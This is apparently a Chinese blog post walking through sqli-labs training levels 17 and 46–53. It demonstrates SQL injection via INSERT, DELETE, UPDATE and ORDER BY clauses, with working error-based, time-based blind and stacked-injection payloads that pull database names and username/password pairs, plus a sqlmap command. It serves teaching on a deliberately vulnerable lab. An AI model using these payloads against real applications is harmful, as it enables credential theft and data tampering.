sqli-labs通关全解---insert,delete,update,order by--less17,less46~less53--6

已于 2023-01-14 14:55:25 修改
阅读量174 收藏
点赞数
分类专栏: sql-labs 文章标签: sql 数据库
于 2023-01-11 20:37:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/128650120
版权

在实际的过程中,不只有select函数可能会造成sql注入漏洞,其他的sql函数同样会造成问题,本文对此进行列举

sql函数

insert函数

适用于只有注入函数,并且会对报错进行回显

示例表

MariaDB [mysql]> desc test;
+--------+----------+------+-----+---------+-------+
| Field  | Type     | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id     | int(10)  | YES  |     | NULL    |       |
| uname  | char(10) | YES  |     | NULL    |       |
| passwd | char(10) | YES  |     | NULL    |       |
+--------+----------+------+-----+---------+-------+

insert报错注入

insert数字型报错注入

[mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

insert字符型报错注入

提示:字符型的关键在于如何在一个字段值内构造闭合。

[mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1)  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'
[mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1)  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

使用按位运算符制造insert数字型报错注入

产生报错是因为1和(select database())的值做按位运算,但是字符不能做按位运算,所以会报错提示哪个值类型错误。"& , | , ^"运算同理。

[mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

[mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

[mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

使用按位运算符制造insert字符型报错注入

insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

使用算术运算符制造insert报错注入(+,-,%,/),灵活运用按位运算符,逻辑运算符,算术运算符。

[mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

[mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

[mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

[mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

[mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

[mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

insert延时注入

示例:

[mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)
[mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)

猜测当前所在库的名称长度,如果数据库长度等于5则延时3秒输出内容。

[mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)
insert盲注如下所示:
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)

delete注入

用于删除一行或几行数据,与UPDATE语句一样. DELETE语句通常使用WHERE子句告诉数据库更新表中哪些行的数据并很可能在这个子句中并入用户提交的数据。破坏正常运行的WHERE子句可能会造成严顶的后果, 我们在UPDATE语句部分提出的警告同样还用于这种攻击

payload:

or or updatexml(1,concat(0x7e,(database())),0) or ' '
or extractvalue(1,concat(0x5e24,(database()))) or ' '
'or(有效载荷)or'
'and(有效载荷)and'
'or(有效载荷)and'
'or(有效载荷)and'='
'*(有效载荷)*'
'or(有效载荷)and'
" - (有效载荷) - "

示例:
delete注入时使用 or 一定要为false,为ture就被执行,没有报错回显了

delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0)

order by

注入方式

在sql注入时经常利用order by子句进行快速猜解表中的列数

通过修改order by参数值,比如调整为较大的整型数如order by 5,再依据回显情况来判断具体表中包含的列数。

判断出列数后,接着使用union select语句进行回显。

基于if语句盲注(数字型)

下面的语句只有order=$id,数字型注入时才能生效,

order ='$id'导致if语句变成字符串,功能失效

字符串型时if()失效,排列顺序不改变

select * from users order by 'if(1=2,id,password)'

数字型时排列顺序改变

select * from users order by if(1=2,id,password)

在知道列名的前提下,可以:

?order=if(表达式,id,username)

表达式为true时,根据id排序

表达式为false时,根据username排序

不知道列名时,可以通过:

?order=if(表达式,1,(select id from information_schema.tables))

如果表达式为true时,则会返回正常的页面。

如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空

基于时间的盲注:

order by if(表达式,1,sleep(1))

表达式为true时,正常时间显示

表达式false时,会延迟一段时间显示

延迟的时间并不是sleep(1)中的1秒,而是大于1秒。 它与所查询的数据的条数是成倍数关系的。

计算公式:延迟时间=sleep(1)的秒数*所查询数据条

如果查询的数据很多时,延迟的时间就会特别长

在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。

4.基于rand()的盲注(数字型)

rand() 函数可以产生随机数介于0和1之间的一个数

当给rand() 一个参数的时候,会将该参数作为一个随机种子,生成一个介于0-1之间的一个数种子固定,则生成的数固定

order by rand:这个不是分组,只是排序,rand()只是生成一个随机数,每次检索的结果排序会不同

order by rand(表达式)

当表达式为true和false时,排序结果是不同的,所以就可以使用rand()函数进行盲注了。

5.报错注入

order by updatexml(1,if(1=2,1,(表达式)),1)

order by extractvalue(1,if(1=2,1,(表达式)));

因为1=2,所以执行表达式内容

例如order by updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)获取数据库名

若改成1=1,则页面正常显示

爆破数据库

?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)

update注入

sql-labs  less17

尝试构造报错,发现没有报错输出,但是有报错提示,无法进行报错注入,进行多次尝试以后发现,如果用户名中输入的是系统中不存在的用户名,则密码中无论是否添加单引号还是双引号闭合,都不会发生报错;但是,如果输入存在的用户名,则添加单引号会引发报错,至此,此处可以进行报错注入,说明后端对用户名字段进行防护和验证,而密码字段没有

获取数据库名称

uname=admin&passwd=1' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#&submit=Submit

获取数据库表名称

uname=admin&passwd=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#&submit=Submit

获取password和users

uname=admin&passwd=1' and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from security.users),1,31),0x7e),1)#&submit=Submit

尝试使用sqlmap进行注入,通过bp将form表单提交的包保存为txt文件,然后通过该包进行注入

sqlmap -r test.txt --dbs --level 3

less-46 GET -Error based-String-Numeric-ORDER BY CLAUSE

爆破数据库

通过观察源码,存在错误输出,可以进行报错注入

 爆破数据库

?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)

爆破数据表:

?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)

爆破users表的列

?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)

爆破用户名和密码

?sort=-1 and updatexml(1,concat(0x7e,(select concat_ws(username,':',password) from users limit 0,1),0x7e),1)

less-47 GET-Error based-String-ORDER by CLAUSE

与上一关类似,闭合方式为单引号

爆破数据库

?sort=-1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

爆破数据表

?sort=-1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

爆破users表的列

?sort=-1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1) --+

爆破用户名和密码,回显有限,修改limit即可

?sort=-1' and updatexml(1,concat(0x7e,(select concat_ws(username,':',password) from users limit 0,1),0x7e),1) --+

less-48 GET-Error based Blind Numeric -Order by clause

该关没有对报错进行回显,可以采用时间盲注编写脚本进行注入

猜解数据库

?sort=-1 and if((ascii(substr(database(),1,1))=115),sleep(10),1) --+

可以参考  Less-8,将less-8的脚本进行修改就可以直接使用

猜解表名

?sort=-1 and if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(10),1);--+

猜内容

?sort=-1 and if(ascii(substr((select username from security.users order by id limit 0,1),1,1))=68,sleep(10),1);--+

less-49-GET-Error based-String-PRDER BY CLAUSE

闭合方式变为 '

 猜解数据库

?sort=-1' and if((ascii(substr(database(),1,1))=115),sleep(10),1) --+

 可以参考  Less-8

猜解表名

?sort=-1' and if(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(10),1);--+

猜内容

?sort=-1' and if(ascii(substr((select username from security.users order by id limit 0,1),1,1))=68,sleep(10),1)

less- 50 Error based -ORDER BY CLAUSE -Numeric-Stacked injection

该题和46题基本相同,区别在于可以使用order by的同时,也添加了堆叠注入的内容,同样可以使用之前的堆叠注入的方法进行注入

?sort=1;insert into users(id,username,password)values(100,'721721','127'); --+

 less-51 Error based -ORDER BY CLAUSE-String Stacked injection

 

同样是堆叠注入加上order by的组合,闭合方式为单引号闭合,但是这次没有错误回显,需要脚本进行注入,与之前的题目基本相同,参考less-8的脚本即可

?sort=1;insert into users(id,username,password)values(100,'721','721'); --+

less-52 GET-Blind based-ORDER BY CLAUSE -numeric -Stacked injection

类似Less-48,但是没有报错回显,使用时间盲注,脚本参考less-8,没有进行闭合

?sort=1;insert into users(id,username,password)values(100,'721','721'); --+

less-53 GET-GET-Blind based-ORDER BY CLAUSE -String-stacked injection

 单引号闭合+堆叠注入+order by,采用时间注入脚本

 

辰霖心
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload-labs更新
weixin_47813861的博客
08-04 122
d1
sql-labs注入1-10关
jinhezhai的博客
01-13 1039
sql-labs1-20关
sqli-labs靶场实现(七)【post update语句注入】(less-17、具体步骤+图文详解)
weixin_46709219的博客
12-30 676
一)post update语句注入   1)mysql update介绍   2)过滤内容介绍   3)mysql update注入   4)sqlmap安全措施 —————————————————————————————————————————————————— 一)post update语句注入 1)mysql update介绍 2)过滤内容介绍 3)mysql update注入 4)sqlmap安全措施 ...
sqli-labs less1-10详解
Abc_Kimball的博客
12-25 277
文章目录第一关,基于错误的GET单引号字符型注入字符串连接函数:进入下面的操作前,先介绍几个函数:第二关第三关第四关第五关 二次查询后续注入,需要先了解count()、rand()、floor()、concat()这三个函数的功能以及group by语句的用法。count()函数第六关第七关第八关盲注利用的函数第九关 时间盲注第十关 第一关,基于错误的GET单引号字符型注入 字符串连接函数: concat(str1,str2) //没有分隔符的连接字符串 concat_ws(str,str2)
mysql|1292错误:Truncated incorrect INTEGER value: ‘‘
qq_45681781的博客
02-22 8036
两方面探查 1.建表的字段类型是a,但输入数据的字段类型是b,两者不相符合 2.可能是个警告,如果用insert into select from 语句插入的时候,查询出来没问题,但是插到表里的时候出现这个问题,可能是个警告,加个ignore语句,忽略警告就可以出来 INSERT ignore INTO t_ccie_age select * from ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
upload-labs 18-21关 详解 (完结)
qq_53409748的博客
03-02 970
upload-labs 18-21关 详解 (完结)
SQL注入(其他)
嚴 帅的博客
04-29 200
(1)sql注入之万能密码(sqli-labs-master/Less-11) 这是一个使用用户名和密码登录的页面 SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; 注释法 用户名处 :admin‘ # ...
JAVA常用框架SQL注入审计
m0_73849256的博客
09-21 1675
​ Wrapper提供了自定义SQL场景,与传统的mybatis一样使用$进行注解,但实际上ew已经做了预编译处理。同样的也支持注解&xml配置。注:需要mybatis-plus版本 >= 3.0.7 param 参数名要么叫ew,要么加上注解@Param(Constants.WRAPPER) 使用${ew.customSqlSegment} 不支持 Wrapper 内的entity生成where语句配置mapper@Mapper}​ 配置controller。
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1282
文章目录前言一、updatexml报错二、updatexml报错记忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先记录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
sqli-labs闯关指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
文件上传解析漏洞(一)、Upload-labs-master1-10 Writeup
weixin_41487522的博客
06-16 581
文件上传解析漏洞(一)、Upload-labs-master1-10 Writeup 今天给大家分享的是文件上传解析漏洞以及Upload-labs-master1-10关的Writeup。喜欢的朋友记得点个赞,最好关注一下嘻嘻嘻。 在写靶场writeup之前先需要了解客户端检测和服务端检测两种校验。 客户端检测: 客户端检测: 一般是在网页上写一段JS脚本,用JS去检测,校验上传文件的后缀名,有白名单也有黑名单。 判断方式: 在浏览器加载文件,但还未点击上传按钮时便弹出对话框,内容例如:只允许上传.jpg/
ORDER BY RAND()
qdujunjie的专栏
01-23 2万+
http://zzstudy.offcn.com/?p=2175> 由于需要大概研究了一下MYSQL的随机抽取实现方法。如:要从tablename表中随机提取一条记录,大家一般的写法就是:SELECT * FROM tablename ORDER BY RAND() LIMIT 1。 但是,在MYSQL的官方手册,里面针对RAND()的提示大概意思就是,在ORDER BY从
sqli-labs通关28
最新发布
03-05
通关28其中的一个关卡,下面是关于sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值